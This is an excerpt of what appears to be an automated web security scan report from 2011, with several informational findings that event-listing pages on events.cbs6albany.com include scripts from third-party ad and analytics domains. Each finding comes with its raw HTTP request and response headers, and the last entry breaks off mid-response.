
18.148. http://events.cbs6albany.com/albany-ny/events/dance previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://events.cbs6albany.com
Path:	/albany-ny/events/dance

Issue detail

The response dynamically includes the following scripts from other domains:

http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads
http://edge.quantserve.com/quant.js
http://js.zvents.com/javascripts/happy_default.js?65617
http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C

Request

GET /albany-ny/events/dance HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:33:43 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 656
ETag: "10c40bc28d8e8b5375ba960a51be0502"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:33:43 GMT; HttpOnly
Content-Length: 28008

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="fb:admins" content="620297159,100001046804596"/>

<script src="http://js.zvents.com/javascripts/happy_default.js?65617" type="text/javascript"></script>
...[SNIP]...

<script type="text/javascript" src="http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C" + z_page_type + "&usetitle=true"></script>
...[SNIP]...

<script type="text/javascript" src="http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.149. http://events.cbs6albany.com/albany-ny/events/education+campus previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://events.cbs6albany.com
Path:	/albany-ny/events/education+campus

Issue detail

The response dynamically includes the following scripts from other domains:

http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads
http://edge.quantserve.com/quant.js
http://js.zvents.com/javascripts/happy_default.js?65617
http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C

Request

GET /albany-ny/events/education+campus HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:35:35 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 375
ETag: "15db376f820c1479e20ba4e23a16ab4d"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:35:35 GMT; HttpOnly
Content-Length: 21469

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="fb:admins" content="620297159,100001046804596"/>

<script src="http://js.zvents.com/javascripts/happy_default.js?65617" type="text/javascript"></script>
...[SNIP]...

<script type="text/javascript" src="http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C" + z_page_type + "&usetitle=true"></script>
...[SNIP]...

<script type="text/javascript" src="http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.150. http://events.cbs6albany.com/albany-ny/events/fairs+festivals previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://events.cbs6albany.com
Path:	/albany-ny/events/fairs+festivals

Issue detail

The response dynamically includes the following scripts from other domains:

http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads
http://edge.quantserve.com/quant.js
http://js.zvents.com/javascripts/happy_default.js?65617
http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C

Request

GET /albany-ny/events/fairs+festivals HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:33:46 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 682
ETag: "a4a64c656b1d94c656fc75ae37014a9e"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:33:46 GMT; HttpOnly
Content-Length: 23978

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="fb:admins" content="620297159,100001046804596"/>

<script src="http://js.zvents.com/javascripts/happy_default.js?65617" type="text/javascript"></script>
...[SNIP]...

<script type="text/javascript" src="http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C" + z_page_type + "&usetitle=true"></script>
...[SNIP]...

<script type="text/javascript" src="http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.151. http://events.cbs6albany.com/albany-ny/events/food+dining previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://events.cbs6albany.com
Path:	/albany-ny/events/food+dining

Issue detail

The response dynamically includes the following scripts from other domains:

http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads
http://edge.quantserve.com/quant.js
http://js.zvents.com/javascripts/happy_default.js?65617
http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C

Request

GET /albany-ny/events/food+dining HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:33:49 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 654
ETag: "fc50c9affd6f001858738f4af50a05b9"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:33:49 GMT; HttpOnly
Content-Length: 27259

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="fb:admins" content="620297159,100001046804596"/>

<script src="http://js.zvents.com/javascripts/happy_default.js?65617" type="text/javascript"></script>
...[SNIP]...

<script type="text/javascript" src="http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C" + z_page_type + "&usetitle=true"></script>
...[SNIP]...

<script type="text/javascript" src="http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.152. http://events.cbs6albany.com/albany-ny/events/music previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://events.cbs6albany.com
Path:	/albany-ny/events/music

Issue detail

The response dynamically includes the following scripts from other domains:

http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads
http://edge.quantserve.com/quant.js
http://js.zvents.com/javascripts/happy_default.js?65617
http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C

Request

GET /albany-ny/events/music HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:33:49 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 1023
ETag: "a5d23d5c96a2955a67aa516e0e7f0125"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:33:49 GMT; HttpOnly
Content-Length: 39878

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="fb:admins" content="620297159,100001046804596"/>

<script src="http://js.zvents.com/javascripts/happy_default.js?65617" type="text/javascript"></script>
...[SNIP]...

<script type="text/javascript" src="http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C" + z_page_type + "&usetitle=true"></script>
...[SNIP]...

<script type="text/javascript" src="http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.153. http://events.cbs6albany.com/albany-ny/events/other previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://events.cbs6albany.com
Path:	/albany-ny/events/other

Issue detail

The response dynamically includes the following scripts from other domains:

http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads
http://edge.quantserve.com/quant.js
http://js.zvents.com/javascripts/happy_default.js?65617
http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C

Request

GET /albany-ny/events/other HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:35:46 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 756
ETag: "8b9b2fd68b63a7509906393f0d930234"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:35:46 GMT; HttpOnly
Content-Length: 29287

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="fb:admins" content="620297159,100001046804596"/>

<script src="http://js.zvents.com/javascripts/happy_default.js?65617" type="text/javascript"></script>
...[SNIP]...

<script type="text/javascript" src="http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C" + z_page_type + "&usetitle=true"></script>
...[SNIP]...

<script type="text/javascript" src="http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.154. http://events.cbs6albany.com/albany-ny/events/performing+arts previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://events.cbs6albany.com
Path:	/albany-ny/events/performing+arts

Issue detail

The response dynamically includes the following scripts from other domains:

http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads
http://edge.quantserve.com/quant.js
http://js.zvents.com/javascripts/happy_default.js?65617
http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C

Request

GET /albany-ny/events/performing+arts HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:34:11 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 668
ETag: "250131937c53fb4566c10898f7db4837"
Cache-Control: must-revalidate, private, max-age=0
